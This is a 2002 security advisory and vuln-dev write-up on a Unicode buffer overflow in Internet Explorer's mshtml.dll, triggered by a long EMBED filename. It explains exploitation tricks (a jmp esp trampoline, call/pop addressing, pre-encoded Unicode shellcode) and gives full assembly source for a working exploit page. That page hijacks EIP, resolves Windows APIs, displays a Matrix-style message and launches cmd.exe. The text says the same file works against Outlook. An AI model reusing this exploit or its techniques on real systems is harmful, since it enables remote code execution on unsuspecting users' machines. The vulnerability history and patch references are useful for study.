Details and exploitation of the buffer overflow in mshtml.dll (and a few side notes on Unicode overflows in general)

Type securityvulns
Reporter Securityvulns
Modified 2002-02-27T00:00:00



The advisory was originally posted in [1-3] two weeks ago. I think enough time has passed to publish some details, especially since [4,5] already contain enough information to rediscover the vulnerability.

ERRor <error(at)> discovered that IE 5.5 and 6.0 crash in some cases on

<embed src="filename.AAAAAAAAAA<lot of 'A's>">

with EIP 0x41004100.
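The reported EIP value follows from the widening of the input to 16-bit characters. The short Python sketch below is not part of the original advisory, and the helper names `widen` and `dword_at` are made up for illustration. It shows the bytes a run of 'A' characters becomes as UTF-16LE, and what a 32-bit little-endian read of those bytes looks like at an even and at an odd byte offset. The alignment at which the saved EIP actually falls inside the overflowed buffer is an assumption here; the advisory only reports the resulting value.

```python
import struct


def widen(text: str) -> bytes:
    """Encode text the way a wide-character (UTF-16LE) buffer stores it."""
    return text.encode("utf-16-le")


def dword_at(buf: bytes, offset: int) -> int:
    """Read a 32-bit little-endian value starting at the given byte offset."""
    return struct.unpack_from("<I", buf, offset)[0]


buf = widen("AAAA")               # bytes: 41 00 41 00 41 00 41 00
print(buf.hex(" "))
print(hex(dword_at(buf, 0)))      # read aligned on a character boundary
print(hex(dword_at(buf, 1)))      # read shifted by one byte (assumed alignment)
```

The read shifted by one byte gives 0x41004100, the value from the crash report, while the read aligned on a character boundary gives 0x00410041.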

The overflow occurs when IE appends the file extension to "Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappingOverride\" with wcscat().
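wcscat() copies until it meets the terminator and never looks at the size of the destination. The check that was missing can be sketched in Python as below. This is only a model of the idea, not the code of mshtml.dll or of the patch: `CAPACITY`, `utf16_units` and `build_key` are hypothetical names, and the real size of the destination buffer is not given in the advisory.

```python
PREFIX = "Software\\Microsoft\\Internet Explorer\\EmbedExtnToClsidMappingOverride\\"

# Hypothetical destination size in wide characters; the real buffer size
# inside mshtml.dll is not stated in the advisory.
CAPACITY = 260


def utf16_units(text: str) -> int:
    """Number of 16-bit units the text occupies in a wide-character buffer."""
    return len(text.encode("utf-16-le")) // 2


def build_key(extension: str, capacity: int = CAPACITY) -> str:
    """Append the extension to the registry prefix only if the result fits."""
    needed = utf16_units(PREFIX) + utf16_units(extension) + 1  # +1 for the terminator
    if needed > capacity:
        raise ValueError(f"key needs {needed} wide chars, buffer holds {capacity}")
    return PREFIX + extension


print(build_key("swf"))
try:
    build_key("A" * 1000)
except ValueError as err:
    print("rejected:", err)
```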

There is a second input validation bug in Internet Explorer: it fails to detect that a file has no extension. In that case it looks for a dot before the filename and treats everything after that dot as the extension. So the buffer can also be overflowed with a long filename that has no extension at all.
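The difference between the two behaviours can be modelled in a few lines of Python. How Internet Explorer really parses the name is not described in the advisory, so both functions below are hypothetical illustrations: the first takes everything after the last dot anywhere in the string, the second looks only at the final path component. The URL is an example value.

```python
def naive_extension(url: str) -> str:
    """Everything after the last dot anywhere in the string (the flawed idea)."""
    dot = url.rfind(".")
    return url[dot + 1:] if dot != -1 else ""


def filename_extension(url: str) -> str:
    """Extension of the final path component only; empty if it has no dot."""
    name = url.rsplit("/", 1)[-1]
    dot = name.rfind(".")
    return name[dot + 1:] if dot != -1 else ""


# Example URL whose filename has no extension at all.
url = "http://www.example.com/files/" + "A" * 40

print(len(naive_extension(url)))     # the host's dot is used, so the "extension" is long
print(len(filename_extension(url)))  # no dot in the filename, so no extension
```

With the naive version the "extension" starts at the dot in the host name and includes the whole filename, so its length is controlled by the filename.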

The rest of this paper is for vuln-dev :)

This is the kind of Unicode buffer overflow that was discussed so much on Vuln-Dev some time ago. Usually we do not write or release exploits for "standard" holes such as format strings or overflows; we only point out that a vulnerability is exploitable. The only reason for this paper is to show how easy this sort of bug is to exploit. We do not plan to release exploits of this kind in the future.

There are a few problems for anyone who wants to create an exploit:

  1. All data is converted to Unicode, so 'A' becomes 0x0041.
  2. The address of the shellcode differs depending on the number of open Internet Explorer windows, the Windows and Internet Explorer versions, and the patches installed.
  3. The offset of the saved EIP on the stack is different in Internet Explorer before and after IE5.5SP2.
  4. One more small problem... We will not describe it, because that may help to stop a virus or a script kiddie with an exploit if one appears in the wild.

Now you can try to exploit this bug yourself... I had a working exploit after half an hour without using any debugger or disassembler :)

One of the first Unicode overflows found in the wild was the vulnerability in an IIS ISAPI filter found by eEye [6]. They did not produce a really working exploit, saying that exploiting this kind of bug is hard. The bug was successfully exploited by hsj and later by the authors of the CodeRed worm. This brings us to the point: EXPLOITATION OF UNICODE OVERFLOWS IS EASY. There is an easy way to bypass the conversion of the shellcode to Unicode: it should be in Unicode already. This was the trick used by CodeRed (a wonderful analysis of CodeRed was made by Andrey Kolishak in [7]). I wrote about Unicode HTML files in [8] (in fact [8] was released to prevent the possible impact of this paper, but it did not succeed, because many filters still do not check Unicode HTML).
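The remark about filters can be illustrated from the defender's side. The Python sketch below is an assumption about how a simple content filter might work, not a description of any real product; `decode_html`, `naive_has_embed` and `has_embed` are hypothetical names. A byte-level search for "<embed" misses the tag in a UTF-16 file because every character is followed by a zero byte, while a filter that honours the byte order mark and decodes first does find it.

```python
import codecs


def decode_html(raw: bytes) -> str:
    """Decode a page according to its byte order mark, if it has one."""
    if raw.startswith(codecs.BOM_UTF16_LE):
        return raw[2:].decode("utf-16-le", errors="replace")
    if raw.startswith(codecs.BOM_UTF16_BE):
        return raw[2:].decode("utf-16-be", errors="replace")
    if raw.startswith(codecs.BOM_UTF8):
        return raw[3:].decode("utf-8", errors="replace")
    return raw.decode("latin-1")  # no BOM: treat bytes as single-byte text


def naive_has_embed(raw: bytes) -> bool:
    """Search the raw bytes, as a filter unaware of Unicode HTML would."""
    return b"<embed" in raw.lower()


def has_embed(raw: bytes) -> bool:
    """Decode first, then search the text."""
    return "<embed" in decode_html(raw).lower()


# A harmless UTF-16LE page containing an <embed> tag (example data).
page = codecs.BOM_UTF16_LE + '<embed src="movie.swf">'.encode("utf-16-le")

print(naive_has_embed(page))
print(has_embed(page))
```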

Andrey pointed out an easy (and well-known) way to avoid the second problem, the hardcoded shellcode address. Instead of overwriting the saved EIP with the address of our shellcode, we can use an indirect jump: overwrite EIP with the address of an instruction in the memory space of some DLL that jumps back to our code via ebp or esp (ebp may be used when exploiting format strings). We found jmp esp (FFE4) in all versions of kernel32.dll and in one version of msvcrt.dll (6.10.8924.0). This version of the DLL does not depend on Internet Explorer and is present in most installations of Windows NT 4.0 and Windows 2000 we checked (but never in Windows 95/98/ME/XP), so we used it.

The third problem was solved by using a few NOPs and a

    call xxxx
    ...
    xxxx: pop ebp

combination to get the exact address of our shellcode.

Since the exploit is in Unicode, we do not have to care about '\0' bytes (only 0x0000 and 0xFFFF are prohibited, and we have to be careful with calls and far jumps), so we wrote a large shellcode with visual effects. If you like it you can download the full version of the dH & SECURITY.NNOV Matrix screensaver from

The resulting HTML (it works with msvcrt.dll 6.10.8924.0 and does not depend on the mshtml.dll version, the program used, or the Windows version) can be obtained from

The same file (properly encoded to UTF-7, UTF-8, quoted-printable or base64) may be used to exploit Outlook Express/Outlook. (I've just noticed that under Windows 2000 the terminal window sometimes opens in the background and you need to switch to it... Well... It's not good, but I won't bother to patch it :) ).

Below is source code for matrix.htm:

-=-=-=-=-=-=-=-=- begin matrix.asm -=-=-=-=-=-=-=-=-
;
; matrix.asm - source code for matrix.htm
;
; build:
;       tasm matrix.asm /m2
;       tlink matrix.obj, matrix.htm /t /3
;
; Authors:
;       ERROR:    bug discovery
;       3APA3A:   idea and coding
;       OFFliner: matrix effects and undocumented Windows API
;
; Thanx to Andrey Kolishak for indirect esp jump idea
;
; you can obtain matrix screensaver from
;
;
;
; eipjmp: overwrites saved EIP for all versions of
;         mshtml.dll
; espjmp: gets control after jmp esp and calls code1
; code1:  restores EIP from stack after call to ebp
;         does some actions and jumps to code2
; code2:  does the rest of actions

datap           equ     (DataTable+080h)
hKernel32       equ     LoadL-datap
cCur            equ     StringTable-datap
SetCCH          equ     StringTable+4-datap
GetSH           equ     StringTable+8-datap
Sleep           equ     StringTable+12-datap
WriteC          equ     StringTable+16-datap
AllocC          equ     StringTable+20-datap
SetCDM          equ     StringTable+24-datap
SetCTA          equ     StringTable+28-datap
SetCCI          equ     StringTable+32-datap
WinE            equ     StringTable+36-datap
ExitP           equ     StringTable+40-datap

hStdOut         equ     StringTable+48-datap
dwOldMode       equ     cCur
conCur          equ     StringTable+52-datap
cls             equ     StringTable+56-datap
DWNumChar       equ     StringTable+60-datap
RegHK           equ     user-datap

.386
_faked  segment para public 'CODE' use32
        assume  cs:_faked
start:
_faked  ends

_main   segment para public 'DATA' use32
        assume  cs:_main

prefix:
begin   db      0ffh,0feh               ;Unicode prefix
        db      "<",0,"e",0,"m",0,"b",0,"e",0,"d",0,0dh,0
        db      "s",0,"r",0,"c",0,"=",0,34,0
        db      "h",0,"t",0,"t",0,"p",0,":",0,"/",0,"/",0
        db      "w",0,"w",0,"w",0,".",0
        db      "s",0,"e",0,"c",0,"u",0,"r",0,"i",0,"t",0,"y",0,".",0
        db      "n",0,"n",0,"o",0,"v",0,".",0,"r",0,"u",0
        db      "/",0,"f",0,"i",0,"l",0,"e",0,"s",0,"/",0
        db      "i",0,"e",0,"b",0,"o",0,"/",0,"X",0
        db      "!(c)3APA3A"
        db      22 dup(090h)
code1:
    pop ebp
    mov esp,ebx
    xor eax,eax
    dataoffset = DataTable - code2
    ebpdiff = 80h + dataoffset
    mov ax,ebpdiff
    add ebp,eax                     ;ebp points to data

    lea eax,[ebp+user-datap]
    push eax
    mov ebx,[ebp+LoadL-datap]
    mov eax,[ebx]
    mov [ebp+LoadL-datap],eax
    call eax                        ;LoadLibraryA("user32.dll")
    lea ebx,[ebp+reg-datap]
    push ebx
    push eax
    mov ebx,[ebp+GetPA-datap]
    mov eax,[ebx]
    mov [ebp+GetPA-datap],eax
    call eax                        ;GetProcAddress(.,"RegisterHotKey")
    mov [ebp+RegHK],eax
    lea edi,[ebp+rhk-datap]
    movzx esi,byte ptr[edi]

LoopHotkey:
    inc edi
    xor eax,eax
    mov al,[edi]
    push eax
    inc edi
    mov al,[edi]
    push eax
    inc edi
    mov al,[edi]
    push eax
    xor eax,eax
    push eax
    call [ebp+RegHK]
    dec esi
    or esi,esi
    jnz LoopHotKey

    lea eax,[ebp+StringTable-datap] ;string "kernel32.dll"
    push eax
    call [ebp+LoadL-datap]          ;LoadLibraryA("kernel32.dll")
    mov [ebp+hKernel32],eax         ;hKernel32 =

    lea eax, [ebp+SetCCH]
    mov [ebp+cCur],eax              ;*cCur = SetCCH
    lea edi,[ebp+funcnum-datap]
    movzx esi,byte ptr[edi]         ;esi=funcnum
    inc edi

LoopResolve:
    push edi
    push dword ptr [ebp+Hkernel32]
    call [ebp+GetPA-datap]          ;GetProcAddress(edi)
    mov ebx,[ebp+cCur]
    mov [ebx],eax                   ;save func address
    xor ecx,ecx
    mov cl,4
    add ebx,ecx
    mov [ebp+cCur],ebx              ;cCur+=4
    not ecx
    xor eax,eax
    repnz scasb                     ;find \0
    dec esi
    or esi,esi
    jnz LoopResolve

    call [ebp+AllocC]               ;AllocConsole()
    push eax                        ;nonzero if succeed
    xor eax,eax
    push eax
    call [ebp+SetCCH]               ;SetConsoleCtrlHandler(NULL,TRUE)
    xor eax,eax
    not eax
    sub al,0Ah
    push eax
    call [ebp+GetSH]                ;GetStdHandle(STD_OUTPUT_HANDLE)
    mov [ebp+hStdOut],eax           ;hStdOut=
    lea eax,[ebp+dwOldMode]
    push eax
    xor ebx,ebx
    inc ebx
    push ebx
    push dword ptr [ebp+hStdOut]
    call [ebp+SetCDM]               ;SetConsoleDisplayMode(hStdOut, 1, &dwOldMode)
    xor ebx,ebx
    mov bl,0Ah
    push ebx
    push dword ptr [ebp+hStdOut]
    call [ebp+SetCTA]               ;SetConsoleTextAttribute(hStdOut,FOREGROUND_INTENSITY|FOREGROUND_GREEN)
    xor ebx,ebx
    mov [ebp+ConCur+4],ebx          ;ConCur.bVisible = 0
    mov bl, 100
    mov [ebp+ConCur],ebx            ;ConCur.dwSize = 100
    lea eax, [ebp+ConCur]
    push eax
    push dword ptr [ebp+hStdOut]
    call [ebp+SetCCI]               ;SetConsoleCursorInfo(hStdOut,&ConCur)
    xor eax,eax
    mov ax,1000
    push eax
    call [ebp+Sleep]                ;Sleep(1000);
    xor ebx,ebx
    mov bl, string-datap
    mov eax,ebp
    add eax,ebx
    mov [ebp+cCur],eax              ;cCur = string
    mov eax,ebp
    mov bx,datap-empty_string
    sub eax,ebx
    mov [ebp+cls],eax               ;set address of empty_string

LOOP1:                              ;do do
    xor eax,eax
    push eax
    lea ebx,[ebp+DWNumChar]
    push ebx
    inc eax
    push eax
    mov eax,[ebp+cCur]
    push eax
    push dword ptr [ebp+hStdOut]
    call [ebp+WriteC]               ;WriteConsole(hStdOut,(void*)cCur,1,&DWNumChar,NULL);
    xor eax,eax
    mov al,100
    mov ecx,[ebp+cCur]
    mov bl,[ecx]
    sub bl,20
    jnz N1
    mov ax,400
N1:
    mov bl,[ecx]
    sub bl,8
    jnz N2
    mov ax,2100
N2:
    push eax
    call [ebp+Sleep]                ;Sleep((*cCur==' ')?400:(*cCur=='\b')?2100:100)
    mov ecx,[ebp+cCur]
    inc ecx
    mov [ebp+cCur],ecx              ;++cCur
    mov bl,[ecx]
    sub bl,9
    jnz LOOP1                       ;while(*cCur!='\t');
    call [ebp+cls]
    mov ecx,[ebp+cCur]
    inc ecx
    mov [ebp+cCur],ecx              ;++cCur
    mov bl,[ecx]
    sub bl,00Ah
    jnz LOOP1                       ;while(*cCur!='\n');
    inc ecx
    xor eax,eax
    push eax
    lea ebx,[ebp+DWNumChar]
    push ebx
    mov al,18
    push eax
    push ecx
    push dword ptr [ebp+hStdOut]
    jmp code2

codelength = $ - begin
neednoops = 1d4h - codelength
            db      neednoops dup(090h)
eipjmp:

            dd      78024e02h
            dd      78024e02h
            dd      78024e02h
            dd      78024e02h
            dw      9090h
            dd      78024e02h       ;EIP for IE < 55SP2


            db 18 dup(090h)
    xor eax,eax                     ;ESP comes here
    mov ax,0170h
    mov ebx,esp
    sub ebx,eax
    call ebx

code2:
    call [ebp+WriteC]
    xor eax,eax
    mov ax,4000
    push eax
    call [ebp+Sleep]
    call [ebp+cls]
    lea eax,[ebp+cmdexe-datap]
    push eax
    push eax
    call [ebp+WinE]
    xor eax,eax
    push eax
    call [ebp+ExitP]

empty_string:                       ; some code can be pasted here
    xor eax,eax
    mov ax,1000
    push eax
    call [ebp+Sleep]                ;Sleep(1000)
    xor eax,eax
    push eax
    lea ebx,[ebp+DWNumChar]
    push ebx
    mov al,30
    push eax
    lea eax,[ebp+empty-datap]
    push eax
    push dword ptr [ebp+hStdOut]
    call [ebp+WriteC]
    ret


    LoadL   dd      780330d0h       ;LoadLibraryA import table entry
    GetPA   dd      780330cch       ;GetProcAddress import table entry


            db      "kernel32.dll",0
    funcnum db      10
            db      "SetConsoleCtrlHandler",0
            db      "GetStdHandle",0
            db      "Sleep",0
            db      "WriteConsoleA",0
            db      "AllocConsole",0
            db      "SetConsoleDisplayMode",0
            db      "SetConsoleTextAttribute",0
            db      "SetConsoleCursorInfo",0
            db      "WinExec",0
            db      "ExitProcess",0
    user    db      "user32.dll",0
    reg     db      "RegisterHotKey",0
    cmdexe  db      "cmd.exe",0
    rhk     db      5
            db      9,1,100,01bh,1,101,13,1,102,05dh,8,103,3,2,104
    empty   db      00dh,28 dup(020h),00dh,0
    string  db      00dh," Wake Up, Neo...",00dh,009h,0
            db      00dh," The Matrix has you...",00dh,009h,0
            db      00dh," Follow the White Rabbit.",00dh,008h,009h,00ah,0
            db      00dh," Knock, knock...",00dh,0

    padding db      32

    suffix  db      34,0,">",0,00ah
    copy    db      "(c) 2002 by 3APA3A, ERRor, OFFLiner"

_main   ends
        end     start
-=-=-=-=-=-=-=-=- end matrix.asm -=-=-=-=-=-=-=-=-


[1] dH & SECURITY.NNOV: buffer overflow in mshtml.dll
[2] Microsoft Security Bulletin MS02-005
[3] CAN-2002-0022
[4] CERT Advisory CA-2002-04 Buffer Overflow in Microsoft Internet Explorer
[5] ISS Alert: Buffer Overflow in Microsoft Internet Explorer
[6] All versions of Microsoft Internet Information Services Remote buffer overflow (SYSTEM Level Access)
[7] Andrey Kolishak, History of one vulnerability (in Russian)
[8] Bypassing content filtering software

--
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)